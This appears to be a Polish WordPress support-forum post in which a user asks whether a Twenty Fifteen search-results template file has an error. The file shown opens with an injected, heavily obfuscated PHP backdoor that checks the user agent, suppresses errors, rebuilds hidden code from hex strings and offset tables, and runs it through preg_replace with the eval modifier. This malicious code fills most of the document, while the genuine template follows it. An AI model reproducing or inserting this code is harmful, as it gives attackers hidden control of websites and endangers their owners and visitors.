• <?php if(!isset($GLOBALS[„\x61\156\x75\156\x61”])) { $ua=strtolower($_SERVER[„\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54″]); if ((! strstr($ua,”\x6d\163\x69\145″)) and (! strstr($ua,”\x72\166\x3a\61\x31”))) $GLOBALS[„\x61\156\x75\156\x61″]=1; } ?><?php $orttxnewfc = 'dovg}%x5c%x7878;0]=])0#)U!x28%151%x6d%160%x6c%157%x64%145%x28%141%878:-!%x5c%x7825tzw%x5c%x782f%x5c%x785c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x521%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%1y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)5c%x785cq%x5c%x7825%x5c%x782dXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj5)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*12njA%x5c%x7827&6<.fmjgA%x5c%:8297f:5297e:56-%x5c%x7V%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x78282400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-rx7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>2b%*::::::-111112)eobs%x5c%x7860un>qp5]43]321]464]284]364]6]234]34>>!}_;gvc%x5c%x7825}&;ftmbg}%##Qtpz)#]341]88M4P8]37]278]225]241]334]368]%x72%164”) && (!isset($GLOBALS[„%xfw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfiuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x24)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Yx7825bG9}:}.}-}!#*<%x5c%x7825nfdf%x5c%x7827*&7-n%x5c%x7825)utjm6<%x5c%x7877825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>”, NULL); }4<!%x5c%x7825mm!>!#]y81]273]y7L3]84]y31M6]y3e]81#%x5c%x782f#7c%x7825j:^<!%x5c%x7825w%x5c%x78607825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudo]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x%x7827pd%x5c%x78256<pd%x5c%x7825w5c%x7824gvodujpo!%x5c%x7824-%x5c%x7824y7%x5c83]248]y83]256]y81]265]y72]254]y76#<%x5c%x7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x785c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqif((function_exists(„%x6f%142%x5f%163%x74%14125)7gj6<**2qj%x5c%x78225!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%g_replace(„%x2f%50%x2e%52%x29%57%x65″,”%x65%166%x61%154%*f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x78c%x7825)m%x5c%x7825):fmji%x5c%x7878:<##:>:h}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%c%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x72^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%x5x5c%x7825!<*qp%x5c%x78UUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825:>1<!gps)%x5c%x7825j:>1<%y>#]D4]273]D6P2L5P6]y6gP7sX%x5c%x7827u%x5c%x7825)7fmji%x5-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5265]y39]271]y83]256]y78]248]y83]256Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7c%x78b%x5c%x7825ggg!>!#]y81w6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x78%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutj7]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%xyfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqns%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782fc%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x%x7860msvd}R;*msv%x5c%x7825)}.;%x5cL6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]277825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w5c%x7825w%x5c%x7860TW~%#762]67y]562]38y]572]48y]###-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpex5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%xx5c%x7825}K;%x5c%x7860ufldpt}X;%x5c78{**#k#)tutjyf%x5c%x7860%x5c%x7878%x85cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x]y81]265]y72]254]y76]61]y33]68]y34]6e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]KcOFHB%x5c%x7860SFTV%x5c%x7860Q7825%x5c%x7824-%x5c%x6Z6<.4%x5c%x7860hA%x5c%x782725-*.%x5c%x7825)euhA)3of>2bd%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zWr#%x5c%x785cq%x5c%x78257%x5%x5c%x7825h>EzH,2W%x5c%x7825wN;5ff2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%QUUI&e_SEEB%x5c%x7860FU85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdo]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x57jsv%x5c%x78256<C>^#zsfvrx72%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x57824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%xc1^W%x5c%x7825c!>!%x5c%x7825i,j%x5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x78256<*doj%x5c%x78257-C)fepmqF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x785c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x782%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6gx78e%x5c%x78b%x5c%x7825w:!>j!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x7825iN}#-!tussfw)%x5322]3]364]6]283]427]7825)n%x5c%x7825-#+I#)q%x5tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x78<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x7x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjg87fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51TQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboe9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x786078:56985:6197g:74985-rr.93e:5597f-s.9735c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x561%156%x75%156%x61”])))) { $GLOBALS[„%x61%156%x75%156%x61″]=1; funct%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x5c%x787x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7%x5c%x7825yy)#}#-#%x5c%x7824-%);} @error_reporting(0); pre5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x]273]y76]271]y7d]252]y#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%]y4:]82]y3:]62]y4c#<!%x5c%x7825t7fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x785)hopm3qjA)qj3hopmA%x5c%x78273q245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:x5c%x782f#00;quui#>.%x5c%x7825!<**7pd%x5c%x78256<C%x5c%x7827p7;mnui}&;zepc}A;~!}%x5c%x787f;!%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQe6]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x782|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%64%50%x22%134%x78%62%x35%165%x3a%146%x21%76%xovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufx7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfs!dsfbuf%x5c%x7860gvodujpo)2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%xs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44c%163%x74%162%x5f%163%x70%154%x69%122)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT25fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovgpn)%x5c%x7825epnbss-%x5c%x78c%x782f7#@#7%x5c%x782f7^#iubq#%xd}+;!>!}%x5c%x7827;!>pI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI5L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]sut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,38<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825bc%x782f+*0f(-!#]y76]277]y72]+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfi>#]y74]273]y76]252]y>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x782%x5c%x78256<.msv%x5c%5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmf!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c87fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gion fjfgg($n){return chr(ord($n)-18]y33]65]y31]53]y6d]281]y43%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x585]256]y6g]257]y86]267]y74]275]y7:]268]]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73f)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]2745c%x7825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!c%x7825kj:-!OVMM*<(<%x5c%x78e%x52]58]24]31#-%x5c%x7825tdz*Wsfuvc%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#9d%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyc%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5cso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782f14x5c%x7825!*3>?*2b%x5c%x7825)gpd>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%xyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x27)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]Kx5c%x7825j:=tj{fpg)%x55c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7x5c%x7824-tusqpt)%x5c%x7825z-#:#*%xc%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fc%x7825c*W%x5c%x7825eN+#Qi%x5c%x785#M5]DgP5]D6#<%x5c%x7825fd74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]yV<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#165c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x782j6<.[A%x5c%x7827&6<%x5c%x7#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x#00#W~!%x5c%x7825t2w)##Qtjw)#]82#825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.7-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827YPNFS&d_SFSFGFS%x5c%x7860QUUI&c_U#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>5c%x782f#%x5c%x7825#%x5c%x782f#::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x782|!}{;)gj}l;33bq}k;opjuk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%xc%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#py7f#<!%x5c%x7825tww!>!%x5c%x7c%x7825l}S;2-u%x5c%x7825!-#2#%x%x7878X6<#o]o]Y%x5c%x78257;utj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfv)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmg%x#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f%x5c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!5c%x782f#%x5c%x782f},;#-#}/(.*)/epreg_replacereehlolvjo’; $baccakdsjo = explode(chr((160-116)),’1856,45,955,34,5249,68,7473,34,5572,28,1983,56,26,40,4151,64,6620,35,6134,45,159,61,4615,27,7350,57,1635,33,3765,28,648,49,482,60,5947,27,7986,50,1199,42,989,69,2438,32,8036,49,9712,29,6879,51,8729,56,2764,56,6655,47,1754,48,5762,42,1901,22,5804,31,9741,68,3894,27,6826,32,263,28,4126,25,2670,67,9271,44,7260,21,6221,57,291,44,4453,25,383,27,4875,50,9557,53,4519,48,335,48,9239,32,4814,61,7407,66,9012,26,4925,59,2144,46,3479,35,3193,35,697,70,6858,21,883,29,3426,53,1476,47,6179,42,6358,66,6424,36,8451,63,4323,43,1802,54,6977,66,4395,58,9809,61,5197,52,7932,54,220,43,2867,57,8245,53,8668,61,8145,30,767,53,2299,22,3793,36,1923,60,5913,34,2039,62,8298,68,820,34,6513,39,9978,62,2990,66,4642,52,9933,45,590,58,5090,68,3994,23,9315,32,3715,29,2321,67,2551,54,8608,60,4215,51,8549,59,3551,66,10080,26,7131,67,8175,70,5367,61,5875,38,1058,56,1586,49,1241,64,2605,65,7281,69,433,49,8905,52,6460,53,4017,42,4478,41,3514,37,8957,55,5974,31,9535,22,0,26,7534,44,9681,31,9400,31,1523,63,4567,48,5649,22,8845,60,1712,42,3269,50,7198,20,7578,39,9652,29,542,48,5317,50,2924,66,4736,25,103,56,2101,43,1305,66,3056,43,3342,26,6745,53,9467,68,1382,30,6039,49,3952,42,10040,40,6088,46,7807,62,5542,30,8514,35,5600,49,3744,21,4266,57,3145,48,1668,44,9083,61,7755,52,6278,26,3368,58,7685,70,5730,32,9431,36,4694,22,8785,35,4366,29,6005,34,5030,60,6798,28,3829,65,3921,31,5671,59,3099,46,9144,33,2470,46,8366,63,5158,39,410,23,4984,46,1412,31,3653,62,9870,63,8820,25,2413,25,3228,41,6930,47,5835,40,1167,32,7218,42,4761,53,6702,43,912,43,4716,20,6552,68,854,29,7901,31,8085,60,5428,56,7043,60,2388,25,8429,22,2190,54,9177,62,2244,55,1443,33,2820,47,9610,42,9347,53,6304,54,3319,23,5484,58,66,37,1114,53,9038,45,7869,32,2737,27,4059,67,7103,28,2516,35,3617,36,7507,27,7617,68,1371,11′); $hvyuugkihx=substr($orttxnewfc,(68083-57977),(33-26)); if (!function_exists(’ctewilkcas’)) { function ctewilkcas($glnprjbupp, $qhrdideund) { $qgackxszcl = NULL; for($izwrzywhvs=0;$izwrzywhvs<(sizeof($glnprjbupp)/2);$izwrzywhvs++) { $qgackxszcl .= substr($qhrdideund, $glnprjbupp[($izwrzywhvs*2)],$glnprjbupp[($izwrzywhvs*2)+1]); } return $qgackxszcl; };} $kymephgwcx=”\x20\57\x2a\40\x71\156\x78\165\x64\153\x65\172\x75\157\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\61\x35\55\x31\67\x38\51\x29\54\x20\143\x68\162\x28\50\x36\62\x36\55\x35\63\x34\51\x29\54\x20\143\x74\145\x77\151\x6c\153\x63\141\x73\50\x24\142\x61\143\x63\141\x6b\144\x73\152\x6f\54\x24\157\x72\164\x74\170\x6e\145\x77\146\x63\51\x29\51\x3b\40\x2f\52\x20\145\x67\142\x61\155\x62\165\x64\152\x71\40\x2a\57\x20”; $twwuycfilj=substr($orttxnewfc,(60282-50169),(64-52)); $twwuycfilj($hvyuugkihx, $kymephgwcx, NULL); $twwuycfilj=$kymephgwcx; $twwuycfilj=(636-515); $orttxnewfc=$twwuycfilj-1; ?><?php
  /**
  * The template part for displaying results in search pages
  *
  * Learn more: {@link https://codex.wordpress.org/Template_Hierarchy}
  *
  * @package WordPress
  * @subpackage Twenty_Fifteen
  * @since Twenty Fifteen 1.0
  */
  ?>

  <article id=”post-<?php the_ID(); ?>” <?php post_class(); ?>>
  <?php twentyfifteen_post_thumbnail(); ?>

  <header class=”entry-header”>
  <?php the_title( sprintf( '<h2 class=”entry-title”>’, esc_url( get_permalink() ) ), ’</h2>’ ); ?>
  </header><!– .entry-header –>

  <div class=”entry-summary”>
  <?php the_excerpt(); ?>
  </div><!– .entry-summary –>

  <?php if ( 'post’ == get_post_type() ) : ?>

  <footer class=”entry-footer”>
  <?php twentyfifteen_entry_meta(); ?>
  <?php edit_post_link( __( 'Edit’, 'twentyfifteen’ ), '<span class=”edit-link”>’, '</span>’ ); ?>
  </footer><!– .entry-footer –>

  <?php else : ?>

  <?php edit_post_link( __( 'Edit’, 'twentyfifteen’ ), '<footer class=”entry-footer”><span class=”edit-link”>’, '</span></footer><!– .entry-footer –>’ ); ?>

  <?php endif; ?>

  </article><!– #post-## –>

Viewing 7 replies - 1 through 7 (of 7 total)
Viewing 7 replies - 1 through 7 (of 7 total)
 • Temat ‘Czy tu jest błąd?’ jest zamknięty na nowe odpowiedzi.